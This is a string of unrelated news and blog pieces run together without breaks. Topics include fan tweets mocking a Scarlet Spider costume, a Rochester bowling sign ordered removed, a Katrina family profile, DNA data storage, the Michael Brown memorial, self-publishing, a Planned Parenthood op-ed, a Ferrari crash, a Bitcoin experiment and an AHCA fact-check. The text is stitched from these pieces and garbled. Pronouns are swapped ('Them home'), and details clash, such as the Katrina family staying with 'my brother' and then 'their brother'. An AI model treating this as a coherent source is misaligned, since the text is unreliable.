This Ben Reilly costume misses the point entirely . A tacked on pointless hoodie but no visible web shooters ? pic.twitter.com/aGayEjrMWd — Mike Oppelganger ( @ theMAC ) January 9 , 2017
Now that Ben Reilly is coming back to the comics… it 's time to update my profile pic . However that new costume is odd . — Kid A ( @ DJKid_A ) January 9 , 2017
I love hoods . On Spider-Gwen , looks dope . But on Scarlet Spider ? I mean did they run out of ideas ? pic.twitter.com/YjXXowVSUf — dumb ugly water trash ( @ justankzz ) January 9 , 2017
The redesign of Scarlet Spider brings up an interesting question . When has a redesign ever looked better than the original look ? — 💀Haunted_Knight🎃 ( @ AntiVenomKnight ) January 9 , 2017
https : //twitter.com/ProtectorZZ/status/818531527139135488
`` That…costume looks like spidercide and kaine boned and produced that ''
– me , to @ TheM6P — Blankie Jen ( @ JenInRGB ) January 9 , 2017
That 's a much better costume . Make them `` Big Ben '' Reilly and be done with it . — Georgie V ( @ LAboytoy ) January 9 , 2017
Bro That is a piece of shit and looks like a costume that a cosplayer designed ages ago on instagram based on gwens — Blankie Jen ( @ JenInRGB ) January 9 , 2017
@ TASK1ne this is a really bad costume . Ben Reilly is getting a series again pic.twitter.com/1NCqnDadvW — # kamalakorp ( @ agentfitz777 ) January 9 , 2017
That new Scarlet Spider costume is gross . — PsychBat ( @ PsychBat ) January 9 , 2017
Mouth visible through the mask is just one of the many things wrong with this Scarlet Spider costume.https : //t.co/3psOvhOUhX — Charlie Bates ( @ batesian ) January 9 , 2017
I 'm not sure if I 'm more disturbed by the New Old Scarlet Spider 's new hood or the new mouth line on their mask… pic.twitter.com/jtZNqCI5h5 — Matt Rower Has n't Thought of a Thanksgiving Name ( @ WarmOtter ) January 9 , 2017
They definitely remembered that Scarlet Spider should have a hood no earlier than six minutes before going to press — Ultra Swagnus ( @ nicolhay ) January 9 , 2017
The weirdest part about that design is that Bagley did some of my favourite Ben Reilly stories . — Cameron Williams ( @ Wasgo ) January 9 , 2017
For those unhappy with my new look , would you prefer this one ? pic.twitter.com/0ZzprunFpV — Ben Reilly ( @ benreillytweets ) January 9 , 2017
I 'm deciding it 's Morph pretending to be the Scarlet Spider . That 's how I 'm justifying that in my brainmind . — Chris but November ( @ chrs00 ) January 9 , 2017
I love Mark Bagley and their art but I ca n't like that Scarlet Spider cover . I CA N'T . THAT FACE . — seb ( @ SYMBlOSlS ) January 9 , 2017
Mark Bagley is doing the art for the new Scarlet Spider series . The design is rough and their right leg looks deformed because of the angle . pic.twitter.com/CNgmX01FTx — 💀Haunted_Knight🎃 ( @ AntiVenomKnight ) January 9 , 2017
Woof . That new # ScarletSpider costume is p bad , huh ? — Pierce Lightning ( @ PELightning ) January 9 , 2017
For real , I do not understand that costume . Why is there a hood ? ! — David Harper ( @ slicedfriedgold ) January 9 , 2017
Jesus… how did they fuck up the Scarlet Spider costume ? — Excelsior , Mr Lee . ( @ RichardCasey ) January 9 , 2017
Scarlet Spider looking real pleased with their hood and not having a nose . pic.twitter.com/lPqFeslfnQ — Leo Johnson ( @ LFLJ ) January 9 , 2017
what the fuck is that face and why is the SCARLET spider got blue on him ? ? ? https : //t.co/Cp872euoK0 — Pumpkin Spice Peter Steele ( @ Big_Boss_Flurb ) January 9 , 2017
With this horrible Scarlet Spider costume , the SM office is headed for maximum @ saturation and ultimate implosion . Too many characters . — Georgie V ( @ LAboytoy ) January 9 , 2017
Why do they look like he 's doing a Jim Halpert face under the mask ? # Spider-Man # ScarletSpider pic.twitter.com/0oGJD2YCPr — 🥧🦃 🍁Stuffing Pants 🍁🦃🥧 ( @ J_Bologna ) January 9 , 2017
I know kinda-bad costumes are part of the Scarlet Spider 's DNA , but these two were definitely better . pic.twitter.com/jKp3n1xwrl — Nick Bryan ( @ NickMB ) January 9 , 2017
https : //twitter.com/flailingkermit/status/818532844238729219
Does anyone like the suit ?
https : //twitter.com/SpideyRy/status/818523448955781122
Well at least that 's the agnostic position…
How long til @ bleedingcool runs `` Internet Reacts to Scarlet Spider '' article ? — Toede ( @ Lord_Toede ) January 9 , 2017
Not long…
About Rich Johnston Chief writer and founder of Bleeding Cool . Father of two . Comic book clairvoyant . Political cartoonist .
( Last Updated )
Related Posts
None found
ROCHESTER , NY ( WROC ) - A family business in the City of Rochester losing part of their identity . L & M Lanes bowling alley was ordered by the city to remove their signature sign
Time has done little to change L & M Lanes . It still boasts two floors of bowling and pulls folks from all over into the heart of the Merchants-Culver Neighborhood . Owner of L & M Lanes , Gary Stubbings says this sign is timeless .
`` That sign itself is a fixture , it 's almost like a Gateway to the commercial area of this neighborhood . ''
Stubbings received a letter in the spring of 2016 that if they do not take down this sign they would be fined $ 600 every month .
`` I do have 1200 dollars worth of fines that need to be paid . Because they started fining monthly for it . ''
They tell News 8 , this battle started with the previous owners . In 2009 when the bowling alley was then Ladd Lanes , the owner applied for two new awnings and after an inspection the City of Rochester found the detatched sign to be in violation of city code . The previous owners appealed and the City denied their request .
`` In the spring of 2016 , I got a letter that my sign was a code violation and it needed to be removed . '' Stubbings said .
According to city documents , the location of the sign is too large and is dangerous . However , customers like Greg Maine have a different opinion .
`` The fact of the matter with that past windstorm in March , alot of trees came down in this neighborhood . I would be more scared of trees as I walk here than that sign. ``
Stubbings tells News 8 after 65 years it 's time it comes down a decision they have to live with .
`` I am not happy about it . I am not happy about it at all . It 's almost like a landmark in some way it 's been there so long . '' Stubbings said
Stubbings plans to take the sign down this month .
.
This story is part of HuffPost Impact 's 12 Days , 12 Cities , 12 Families series , highlighting Americans who have persevered to overcome incredible challenges and the nonprofits that helped change their lives . Check back tomorrow for the continuation of this series .
What more is there to say about Hurricane Katrina and New Orleans ? After the photos and videos from 2005 , the controversy and criticism , and the years of rebuilding , what more stories can there be ? Of course , four years after Katrina , there are still more than 2,000 families living in FEMA trailers and thousands of others in temporary housing . Indeed , the most touching and devastating of these stories may belong to the people who , despite their best efforts , still have yet to return home .
Jennifer Lanier lived a modest , but pleasant life in St. Bernard Parish , adjacent to the Lower 9th Ward in New Orleans . They had a steady job with benefits as a waiter , and was able to provide for their three children , Zillah , Lillian and Isabella . They hesitantly took advice to evacuate their home in New Orleans the day before Katrina hit . They believed that them and their family would be able to return within a few days , so they traveled the 60 miles to Carriere , Mississippi , where they stayed with my brother .
Within a matter of days , Jennifer realized that their family had lost everything .
Them home , like all 27,000 others in St. Bernard Parish , was completely flooded . Jennifer had few places to turn , as all of their family members ' homes in New Orleans were also flooded . After leaving their brother 's house , the family moved in with Jennifer 's grandmother in Mississippi . It was n't until just last year that they finally returned to New Orleans , moving in with Jennifer 's mother .
Over the phone , Jennifer told me that one of the hardest things for them as a parent is the inability to provide their children with the stability that they had achieved pre-Katrina . Though the hurricane took their possessions , the ensuing years have stripped their family of security and forced them into the growing population of Americans who do n't know where they might sleep or get their next meal .
Now , with help from a local organization , they may finally be able to move back home .
The St. Bernard Project works to rebuild houses destroyed or damaged by Hurricane Katrina . The organization is currently attempting to prevent Jennifer 's damaged house from being demolished , though they currently have insufficient funds to begin rebuilding the house . The St. Bernard Project works with many New Orleans residents who face similar circumstances , including Octave Francis in Gentilly and Darrell Betha in Meraux .
The St. Bernard Project has been working since 2006 to give these Katrina survivors the shelter and security they currently lack . In just the last few years , they 've rebuilt 246 homes , utilizing more than 17,000 volunteers . Despite their headway , the St. Bernard Project still receives at least 10 applicants a week -- families much like Jennifer 's . You can help by contributing to The St. Bernard Project or directly to Jennifer Lanier via the widget below .
A typical rebuild through St. Bernard 's Project costs about $ 15,000 worth of building supplies . By donating even a little , you will make a direct impact on the lives of Jennifer and their family , and help turn a house back into a home .
Get HuffPost Impact On Facebook and Twitter !
Disclaimer : By using the above widget , you have elected to directly give funds to this individual . For purposes of clarity , any funds that you give are not going to a 501 ( c ) ( 3 ) qualified organization or other charitable organization but rather an individual person . Causecast Corporation and The Huffington Post make no representations or warranties as to the legitimacy of this person 's story , need for assistance , or the amount of any medical or other bills , if any , owed by this individual . Causecast Corporation and The Huffington Post make no representations or warranties that the funds you give will be used by this individual for the intended purpose . Causecast Corporation and The Huffington Post in no way monitor or oversee the use by this individual of any funds you choose to give to them . Causecast Corporation and The Huffington Post make no representations or warranties as to any tax benefits or deductions available to you by reason of giving funds to this individual .
All 154 Shakespeare sonnets have been spelled out in DNA to demonstrate the vast potential of genetic data storage
Their words have touched the lovelorn and been pored over by brooding teenagers for more than four hundred years , but now some of the most romantic poems ever penned have been written into the molecule of life .
The entire collection of Shakespeare 's 154 sonnets has been spelled out in DNA by scientists in Cambridge to demonstrate the vast potential of genetic storage . Huge quantities of information could be written into specks of DNA and archived for tens of thousands of years , the researchers claim .
Alongside the Bard 's sonnets , the scientists made strands of DNA that stored part of an audio file of Martin Luther King 's 1963 speech `` I have a dream '' , and the seminal research paper that first described the double helical nature of DNA by Francis Crick and James Watson , a decade earlier .
Written in DNA , one of Shakespeare 's sonnets weighs 0.3 millionths of a millionth of a gram . One gram of DNA could hold as much information as more than a million CDs , the researchers said .
Nick Goldman and Ewan Birney at the European Bioinformatics Institute in Hinxton , near Cambridge , came up with the idea in a pub in Hamburg . They wondered what alternatives might exist to the expensive hard disks and magnetic tapes used to store the growing datasets that are becoming ever more common in biology .
They knew that DNA was an incredibly efficient and compact way to store information , and set about devising a way to turn the molecules into digital memory : capable of encoding the 1s and 0s used to store words , images , music and video on computers .
`` We wrote on napkins and sketched out details , and realised we could probably do this , '' said Goldman .
The scientists developed a code that used the four molecular letters or `` bases '' of genetic material – known as G , T , C and A – to store information .
Digital files store data as strings of 1s and 0s . The Cambridge team 's code turns every block of eight numbers in a digital code into five letters of DNA . For example , the eight digit binary code for the letter `` T '' becomes TAGAT .
To store words , the scientists simply run the strands of five DNA letters together . So the first word in `` Thou art more lovely and more temperate '' from Shakespeare 's sonnet 18 , becomes TAGATGTGTACAGACTACGC .
To test the procedure , Goldman and Birney converted the sonnets , Martin Luther King 's speech , and the Watson and Crick paper into their new DNA code and emailed it to a US company called Agilent , which makes physical strands of DNA commercially for researchers . Several weeks later , the company returned a tiny test tube to the scientists . It contained a speck of DNA that encoded all the information they had sent .
To make sure the DNA stored the information correctly , the Cambridge scientists mixed it into a solution and ran it through a gene sequencing machine . From that , they were able to read the complete files again , according to a report in Nature .
A similar feat was achieved by the Harvard geneticist , George Church , last year . They encoded a copy of their book Regenesis , 11 images , and a computer program in DNA .
The Cambridge work differs in how it corrects for spelling mistakes made when the DNA is either written , or read out at the other end . Each `` word '' of DNA code is written in four different ways , and there are millions of copies of each of these . Any mistakes in the DNA are likely to affect only a minority of the strands of code , and these can be spotted by comparing them .
`` One of the great properties of DNA is that you do n't need any energy to store it . You keep it cold , dry and dark , and it lasts for a very long time . We know that because we routinely sequence woolly mammoth DNA that is kept by chance in those sorts of conditions , '' said Birney .
The high cost of making DNA today means genetic storage in biological hard drives will not be practical for a long time . But Birney said that another 100-fold drop in the cost of DNA sequencing , which has already happened in the past decade , makes DNA storage economic for information that has to be archived for more than 50 years .
Asked whether the DNA might pose a danger to health , if it found its way into a person or other animal , Goldman said : `` The DNA we 've created ca n't be incorporated accidentally into a genome , it uses a completely different code to that used by the cells of living bodies . If you did end up with any of this DNA inside you it would just be degraded and disposed of . ''
Supporters helped to rebuild a memorial built in honor of Michael Brown on Friday in Ferguson , Mo. , after a driver crashed into it overnight . ( Netta via Vine )
People hurriedly cleaned and rebuilt a memorial to Michael Brown in Ferguson , Mo. , on Friday morning after they said a car intentionally destroyed it .
Flowers , signs and other mementos , left in remembrance of the 18-year-old who was killed in a police shooting in August , were scattered throughout the streets , stirring supporters who saw pictures on social media to gather to restore the makeshift shrine .
Just got to # MikeBrown memorial and it 's been run over . Someone who saw it on video said it was intentional . pic.twitter.com/UlR2TGSxCS — J. Meless ( @ jay_myles2 ) December 26 , 2014
I ca n't believe some destroyed the Canfield memorial on Christmas . Hate is deep . ( via @ jay_myles2 ) pic.twitter.com/XumtQ23gMT — deray mckesson ( @ deray ) December 26 , 2014
A few people are here and planning to restore the memorial right now . Hate wo n't win tonight # MikeBrown # Ferguson — J. Meless ( @ jay_myles2 ) December 26 , 2014
Officer Timothy Zoll , the Ferguson Police Department 's public relations officer , said that no crime had been reported in connection to the memorial 's destruction . They suggested that the department would look at any video of the incident , but they did not specify whether the department would investigate . “ I do n't know that a crime has occurred , ” Zoll said Friday . “ But a pile of trash in the middle of the street ? The Washington Post is making a call over this ? ” Ferguson police officer Darren Wilson fatally shot Brown on Aug. 9 , sparking a national conversation about race relations and police enforcement in the United States . The memorial sits in the middle of a street near the Canfield Green apartment complex , where Brown was shot and died . The memorial was rebuilt by morning .
The rebuilt # MichaelBrown memorial on Canfield . @ michaelcalhoun first reported car destroying it this am . pic.twitter.com/us85BXlFUy — Brett A. Blume ( @ brettblumekmox ) December 26 , 2014
One of the themes of 2012 has without a doubt been the rise of self-publishing .
We learned earlier in the year at Digital Book World that in 2012 , self-publishing took a $ 100 million bite out of U.S. trade publishing revenues in 2011 . Sounds like a lot but is n't much compared to the nearly $ 14 billion in revenues the book business made in the U.S. that year . This year , the number is certain to be more .
Regardless of how you measure it , self-published books have had a huge impact on the publishing world in 2012 . We 've seen multiple deals where a self-published author was picked up by a major publisher after already banking huge ebook sales . One was a huge first for the industry : Simon & Schuster bought the rights to publish just the print edition of Hugh Howey 's Wool * . And if you look at the top-selling books of 2012 ( Amazon , iTunes ) , several of them started out as self-published .
Today we saw another first for self-publishing . A self-published work was named to the best-books of the year list of the highly respected and ultra-tough book reviewer for the New York Times , Michiko Kakutani .
The book is The Revolution Was Televised : The Cops , Crooks , Slingers and Slayers Who Changed TV Drama Forever by Alan Sepinwall . They called the book `` a smart , observant look at 12 'great millennial dramas ' — including 'The Sopranos , ' The Wire , ' '24 , ' 'Friday Night Lights , ' 'Mad Men ' and 'Breaking Bad ' — that transformed the TV landscape and moved the small screen out from under the shadow of the movies . '' Unlike in the other nine blurbs , they did not name a publisher .
Self-publishing was once `` vanity publishing , '' something that you did if you just could n't cut it with a traditional publisher . And it certainly was n't big business . All that 's changed . Read more here .
* Hugh Howey will be on stage with their agent Kristin Nelson at Digital Book World 2013 to discuss the Wool deal .
I 'm testing a WhenHub visualization that is optimized for comics . Here are some of my Robots Read News comics that I thought worked best . For optimal viewing , click the icon in the lower right of the Whencast to view as a full page .
Obviously I could have pasted the comics directly to the blog page . But WhenHub adds a number of features that I do n't get on the blog . For example , as a reader you could use our cloning feature , edit out the comics you do n't like , and share as your own WhenCast on Facebook or anywhere else .
Think of a Whencast as a way of offering digital “ shelf space ” on a blog or media site . That shelf space can be managed by any trusted content provider . Any changes at the source will flow automatically to every page that has the embedded WhenCast .
How cool is that ?
Last week , Wisconsin Gov . Scott Walker signed two bills to restrict public funding of Planned Parenthood . The first pulls federal Title X family planning funding from Planned Parenthood of Wisconsin , which has been the sole Title X grantee in the state , and redirects the money to the state 's Well Woman program . The second bill limits how much Planned Parenthood can be reimbursed under Medicaid for contraception .
Proponents of the legislation asserted that defunding Planned Parenthood would have no impact on patients ' access to high-quality family planning services . Unfortunately , however , the Wisconsin bills and comparable efforts in other states -- on Sunday , Ohio Gov . John Kasich signed legislation blocking public funds from Planned Parenthood in their state -- come amid continuing congressional attempts to erode publicly funded family planning across the country . All of these efforts seek to shrink the capacity of long-trusted safety net providers to leverage scarce public resources for delivering subsidized care to millions of poor and low-income individuals .
The fact that Planned Parenthood provides abortion care is , of course , the issue driving these ongoing efforts to punish the organization , even though by law federal funds can not be used to cover the costs of abortions . Despite that restriction , since last summer Congress has advanced a number of proposals to divert public resources from Planned Parenthood , suggesting that there is a larger , ready-made network of other trained providers that can provide family planning care .
This argument demonstrates a fundamental lack of understanding of how millions of individuals across the country have their preventive-care needs met . The debate should not be about whether or not other providers in the area have the capacity to handle the influx of patients who would be seeking care after Planned Parenthood affiliates are banned from receiving Title X funding . What 's really at stake is whether low-income women and men should have the same right to choose their care providers as do those with private health insurance .
No two patients are the same . That 's particularly true in family planning . People seeking care -- both women and men -- make different decisions and have unique needs based on individual health and life circumstances . In the private insurance market , most women have direct access without a referral to obstetrics/gynecology specialists separate from their primary-care providers . The same is true in the Medicaid program : Federal law protects the right of enrollees to freely choose to receive family planning services from any qualified provider . This should be true for all individuals , not just those with insurance .
And you ca n't just whimsically shift Title X funding , which pays for birth control , cancer screenings , STD services and well-woman exams for more than 4.1 million people annually . Title X is a competitive grant program that funds applicants , including state health departments , family planning councils , hospitals , community health centers or Planned Parenthood affiliates , that demonstrate a strong capacity to deliver high-quality family planning care to primarily low-income and uninsured women and men . These provider networks look different from state to state because they are designed to meet the specific needs of the communities they serve .
That is why it is important for Title X to support a diverse network of providers , with nurse practitioners , doctors and educators trained and focused on providing high-quality , compassionate and confidential care . Low-income , uninsured or underinsured women and men should have the same access to care as their insured counterparts . And they should be able to seek that care from the provider of their choice -- even if that provider is Planned Parenthood .
It is a disservice to a patient to tell them they can no longer see their trusted family-planning provider based solely on their income or insurance status . Yet by giving states or Congress the discretion to restrict longstanding provider protections , we risk reversing the recent advances we 've made in eliminating gaps in gender equality and care delivery in our nation 's health-care system .
While demand for publicly funded family planning has continued to grow , the Title X budget has been cut year after year . We do n't need any more damaging policies that limit provider choice and block access to care . We need real , lasting support to help the millions of women and men served in the safety net get the information and care they need from the providers they trust .
There 's the right way to tackle the infamous Corkscrew at Laguna Seca and then there 's the way that puts your Ferrari 458 Italia into the catch fence and on its roof . Ryan Ockey recently gave the latter option a shot during the Ferrari Challenge at Mazda Raceway with predictable results . All of the safety equipment both in the car and at the track worked as intended , however , and the driver walked away with little more than a bruised ego . There are no solid reports as to what caused the flying Ferrari , but rumor has it there may have been a brake failure.Unfortunately , the 458 Italia had to be pulled from the gravel trap by a tow truck , which meant a long , painful slog downhill on the Italian exotic 's roof . Check out two videos of the carnage and the rescue to see what we mean . Jump forward to two minutes in on the second clip to see things go downhill for Ockey .
I lived on Bitcoin for a week in 2013 – Day 1 / Day 2 / Day 3 / Day 4 / Day 5 / Day 6 / Day 7 -- and learned a lot .
This year , I repeated my experiment -- Day 1 / Day 2 / Day 3 / Day 4 / Day 5 / Day 6 / Day 7 . Here 's what I learned this time :
1 . It is easier to live on Bitcoin this year than last . I did `` Living on Bitcoin : Part Deux '' because every time I talked about living on Bitcoin for a week in 2013 , people would ask if it would be easier now . I got sick of saying , `` I think so . '' Now I know that the answer is , `` Yes . '' Last year , I had to bike or walk anywhere I wanted to go , lost 5 pounds , moved out of my home , and constantly felt like a crazy person for asking people if they would accept payment in a made-up currency they 'd never heard of . This year , I ate a 17-course dinner , went on a wine tour in Santa Cruz , and was able to use a ride-sharing service for all my trips , though I could n't buy gas when I drove myself . More people are familiar with Bitcoin and more merchants accept it . Most importantly for me , payment intermediaries such as Gyft and Foodler accept it , giving me access to the services of the retailers and restaurants they 've partnered with . And there will only be more merchants , with eBay being the latest to say they are considering it .
2 . Bitcoin has infiltrated the mainstream consciousness . It 's definitely got the media captured . There 's a Wall Street Journal BitBeat blog devoted to it . Bloomberg put it on its terminals for traders and Bloomberg BusinessWeek put it on the cover of their magazine ( as a unicorn ) . Newsweek put it on their cover in an unmasking of its mysterious creator Satoshi Nakamoto gone awry . Bitcoin has its own magazine created by its supporters and its own news service started by investor Shakhil Khan . Google search trends shows rising interest , especially when Bitcoin 's price has spiked , with the most interest in December 2013 when Bitcoin , worth mere pennies a four years earlier , surpassed $ 1000 a coin . According to a recent survey from The Street and research firm GfK , 75 % of people still do n't know what Bitcoin is and 80 % would n't consider using it . Anecdotally , in the Bay Area this week , I 'd say at least 75 % had heard of it , though many were skeptical about using it .
3 . I used to feel crazy when I asked people if I could pay for things in a made-up virtual currency , but now that Bitcoin is more widely known , I just feel eccentric .
4 . People may have heard of Bitcoin but they still do n't understand how it works . In my interactions with Lyft drivers , vintners , friends , strippers and coffee shop clerks , I found that many people knew of Bitcoin but they wanted to know how it worked . `` It 's a giant public ledger maintained by a network of people running the Bitcoin program on their computers around the globe , decrypting and encrypting Bitcoin transactions broadcast to the network , who in exchange get 'mining fees ' and Bitcoin payouts at a regular but decreasing-over-time rate , '' I 'd say . `` It 's the online equivalent of sending cash , in that you can send it online with no information attached , and once sent you ca n't reverse the payment , '' I 'd add trying to simplify it . Sending Bitcoin is ridiculously fast , but using it in person is often slow , because you have to have a long conversation about the payment method you 're using .
5 . The mechanics of Bitcoin are more complicated than many make it out to be . Proponents emphasize that a utility of Bitcoin is that there `` are no fees '' when you send a payment because it 's processed by the Bitcoin network rather than a bank or credit card intermediary that charges you . In fact , the network is an intermediary and involves a bunch of people spending significant money on power to run the machines that run the network . Right now , they get paid in the form of new Bitcoin entering the network at regular intervals . More than 12 million bitcoin have been created of 21 million total , an amount that will be reached next century . But they also charge a very tiny mining fee set by Bitcoin developers . It is currently .0001 Bitcoin , or 4 cents . Not including the mining fee when you send a transaction mimics what will happen to the Web with the elimination of net neutrality . The miners bump your request to the bottom of their queue and it will take longer to go through ( which is what happened to me , I think , when I was n't able to buy lunch at Buyer 's Best Friend because it took the Bitcoin network 67 minutes to confirm my $ 26/.0832 BTC payment ) . Those fees will eventually go up , as argued by the Economist .
6 . There are people running the Bitcoin network and making decisions about how Bitcoin works . Though we often talk about Bitcoin as a faceless , automated network , there are software engineers making decisions about the Bitcoin program and implementing changes to the code . The mining network votes on those changes . It 's not as institutionalized as the Federal Reserve but a loose structure of governance does exist . The lead developer for Bitcoin , Gavin Andresen -- different spelling and no relation to Marc Andreessen , the venture capitalist pouring millions into Bitcoin start-ups -- is also on the board of the `` Bitcoin Foundation , '' an organization that financially supports the Bitcoin network and advocates for it . It 's received nearly 6,000 Bitcoins in donations ( which is nearly $ 3 million at current value ) . Things get messy when humans are involved .
7 . People are arriving late to the Bitcoin gold rush . In the early days of the Bitcoin program , you could download the software to your computer , go to sleep and wake up the proud new owner of 50 new Bitcoin ( worth less than a dollar then , but $ 22,000 now ) . It 's not so easy now , as the 16-year-old miner I met in Silicon Valley learned ; they spent $ 1,000 to build a machine that could participate in the network and the power to run it , and earned .38 BTC or $ 200 . You need more powerful machines to do more difficult cryptographic hashing and lots of mining companies have popped up to sell them to people . But there are many tales of woe , lawsuits , and some FTC complaints from people who tried to buy money-minting machines .
8 . When things do go wrong in Bitcoin , it 's not clear who you turn to . The wonderful thing about Bitcoin is that it 's a stateless , decentralized currency . The bad thing about Bitcoin when things go wrong is that it 's a stateless , decentralized currency . Ask people who had their Bitcoin savings stashed with Mt . Gox . `` Anything that makes the headlines and is shiny and new tends to get misused by people trying to separate people from their hard-earned money . New Bitcoin , old scams , ” says Lori Schock , the director of the SEC 's Office of Investor Education and Advocacy . `` The challenge of getting your money back is grossly understated for any investor who runs into problems with a virtual currency . ''
9 . For all its complications , Bitcoin is an incredibly easy way to instantly open a bank account . It makes creating a place to store value online easier than getting an email address . And it 's incredibly easy to use . You scan a QR code or plug in a Bitcoin address and send money instantly . That is an incredible innovation and is why people are so excited about Bitcoin . And it makes this easy for anyone with a computer or smartphone and an Internet connection , whether they 're in the country without a good banking system or a financially disenfranchised teen . Like cash , Bitcoin does not discriminate . `` The reason I was so excited over Bitcoin was because , as a 16 year old , I had trouble buying stuff on the internet since I did n't qualify for credit cards or a Paypal yet , '' said a ( young ) commenter on one of my posts . `` I thought , and still think , that Bitcoin could fill that gap . ''
10 . Belief tastes like a cappuccino at Coupa Cafe . I said last year that `` I wo n't totally believe in Bitcoin until I can buy a fresh cup of coffee with it . '' I got my cup of coffee this year , though I did have to drive 30 miles south for it . Living on Bitcoin means traveling to places and websites you would n't usually visit .
11 . Using Bitcoin in the real world is n't the point of Bitcoin . My experiment is a lark -- a good way to make Bitcoin tangible and to meet the people involved -- but it 's not revelatory of Bitcoin 's innovation.Bitcoin is still better as an online payment method than an in-person one . `` Bitcoin is programmable money ! '' complained one Redditor frustrated with the emphasis on where Bitcoin can be spent rather than how it can be spent . Bitcoin makes micropayments possible , so that you could theoretically send someone 85 cents because you liked their tweet , or 10 cents to read an article online rather than having to be bombarded with ads . It makes it easy to pay someone you do n't know without exchanging a bunch of information about yourself . When you make a payment you do n't need to include your name , address , phone number , email address , etc . for fraud prevention purposes , because you can only spend Bitcoin you have , like cash . And yes , merchants take it cut down on the fees usually charged by credit card fees -- though they are usually paying 1 % to processors like Bitpay and Coinbase who charge a fee to turn Bitcoin into USD .
12 . If you are living in Bitcoin in the `` real world , '' you need to think ahead and call ahead . Otherwise you may end up in a Kmart parking lot , low on gas , with no way to get more .
13 . Accepting Bitcoin as a merchant is a great way to get publicity but may not result in any actual Bitcoin business . I saw the Santa Cruz Experience -- a wine tour company -- cited in numerous articles about businesses in the travel industry that accept Bitcoin . It had been accepting Bitcoin for a year , but I was the first person to actually pay them in it .
14 . It 's possible to run a business in only Bitcoin , with no bank account . Blockchain.info would scoff at my living on Bitcoin for a week ; they run a whole business in Bitcoin , with 16 employees over 4 continents .
15 . However , most Bitcoin-accepting merchants are instantly turning their Bitcoin into cash . Vinny Lingham of Gyft thinks it 's part of what 's depressing the value of Bitcoin , creating more sellers in the market than buyers .
16 . For early ideological Bitcoin adopters , Bitcoin was their favorite indie band and they hate that it 's gone mainstream . They like that they 've made so much money off of recognizing Bitcoin 's potential , but they hate the attempts to regulate it and make the Bitcoin ecosystem look so much like the traditional financial ecosystem with the equivalent of Bitcoin banks that take a cut of transactions .
17 . A bitcoin dollar goes farther this year and I have more places to spend it . I spent nearly 5 bitcoin worth $ 600 last year during my week of living on Bitcoin in 2013 . I spent 3.8 bitcoin worth $ 1,600 this week . And I will need to pay capital gains tax on the $ 1,000 of appreciation in those assets I spent .
18 . Bitcoin is an instant global currency . When I went to a strip club where I could pay in Bitcoin , a dancer told me they had been tipped in Japanese and Pakistani currency in the past and had no idea what it was worth until they went to a money exchanger to cash it in . The latter was n't even worth changing for dollars . With Bitcoin , you have a universal currency that could make traveling easier .... if more merchants were to accept it .
19 . Bitcoin still scares governments . Bitcoin 's legality around the world is still a toss-up , which is part of the reason Apple wo n't let Bitcoin-transmission apps in its store . China is doing its best to push Bitcoin out of its borders by shutting down and choking the businesses that exchange Bitcoin for Chinese currency . It is the greatest test of the stateless currency 's resilience . The U.S. is taking a different approach , embracing Bitcoin with regulation and taxation , perhaps killing it with government kindness .
20 . The week is not as exciting as the year before . I spent less time on the fringes of society , and more time talking to entrepreneurs who have * made it * as their Bitcoin start-ups have taken off and attracted millions in venture capital . The new Bitcoiners are not quirky like early Bitcoiners -- such as the guy who told me they trade based on the alignment of the planets ( 14:17 mark ) . Bitcoin is not as fun and weird anymore ; people are serious about it because there 's serious money to be made and lost . Just this week , Bitpay announced that it received $ 30 million in venture capital from Virgin 's Richard Branson , founder of Yahoo Jerry Yang , and Asia 's richest man Li Ka-Shing of Hong Kong , who apparently does n't believe China can kill Bitcoin .
The `` dark side '' of Bitcoin does n't come up as often . When the government sent out a warning about Bitcoin this week , it was from the SEC and it contained a warning to people who have Bitcoin that they should be wary of fraudsters who seek to separate them from their now valuable money with high-risk investment schemes . No longer are U.S. lawmakers uniformly trying to crack down on Bitcoin , they are embracing it , with the Federal Election Committee approving Bitcoin for political donations ( as long as the recipients immediately turn it into cash ) . Internet-savvy Democrat Jared Polis of Colorado immediately started accepting them . He 's immediately raised $ 1,500 from 39 donors , all donors I presume who included their names , addresses and occupation with their payments , per campaign rules , attaching their identities to at least one address on blockchain -- making it more likely their identity can be tied to their other transactions .
21 . There is a battle to keep the anonymous features of Bitcoin that first made it attractive as the currency for illicit marketplaces . There are people trying to sanitize Bitcoin who meet with people in Washington , D.C. regularly and there are people who still want it to be `` a private means for black market transactions . '' Right now , it feels like the sanitizers are winning , but the anonymity proponents have multiple projects in the works . From experience , I can tell you Dark Wallet is still pretty buggy , but Blockchain.info 's tumbler works like a charm .
I 'm not sure if I 'll live on Bitcoin again next year or not . I might start feeling like Mitch Maddox , a.k.a . DotComGuy , whose claim to fame was living on the Internet alone in 2000 -- a hardly impressive feat now . I 'd love to hear whether you think I should in the comments . But if I do , I can see even more naked people . A nudist resort in Canada now takes Bitcoin because `` a virtual currency is perfect for people without pockets ! ''
Follow @ kashhill
So if a state chooses to waive the regulation , insurers could charge much more for pre-existing conditions like H.I.V . and trauma — not rape on its own — but they can not deny coverage outright because of them .
Some websites , like Distractify , also claimed domestic abuse was a pre-existing condition under the bill .
“ The New AHCA Bill Lists Sexual Assault And Domestic Abuse As ‘ Pre-Existing Conditions ' ”
THIS NEEDS CONTEXT . Before the Affordable Care Act , several states did not have laws that prohibited insurers from counting domestic violence as a pre-existing condition . But it 's unclear if insurers actually did deny coverage to victims of domestic violence in the years that immediately preceded passage of the health law .
Five states — Idaho , North Carolina , South Carolina , Vermont and Wyoming — do not bar insurers from considering domestic violence a declinable pre-existing condition , said Gretchen Borchelt , the vice president for reproductive rights and health at the National Women 's Law Center . Many insurers did deny coverage to domestic violence victims in the 1990s , according to multiple surveys . When PolitiFact examined the issue in 2009 , it found no evidence this was an ongoing or widespread practice .
Others , like the People for Bernie Sanders , shared an image claiming the bill would “ end ” insurance for those with pre-existing conditions .
“ 217 Republicans voted today to end your healthcare if you suffer from ” a range of medical issues including AIDS/H.I.V. , acne , depression , heartburn and ulcers .
THIS NEEDS CONTEXT . Many of the medical issues specified by the image , courtesy of Senator Sherrod Brown , Democrat of Ohio , were considered pre-existing conditions before the Affordable Care Act . But the bill would not literally “ end ” coverage because of them as it does not remove the act 's rule on guaranteed issue and requires the state waiver process .
Of all the conditions listed , the Kaiser Family Foundation found evidence that before the Affordable Care Act , about three dozen of them were declinable — from AIDS/H.I.V . and lupus to severe obesity and diabetes . Others such as acne , allergies , migraines and ear infections could trigger higher costs or fewer benefits .
Kaiser also stated that the vast majority of people with these conditions have insurance through employers or other public options like Medicaid .
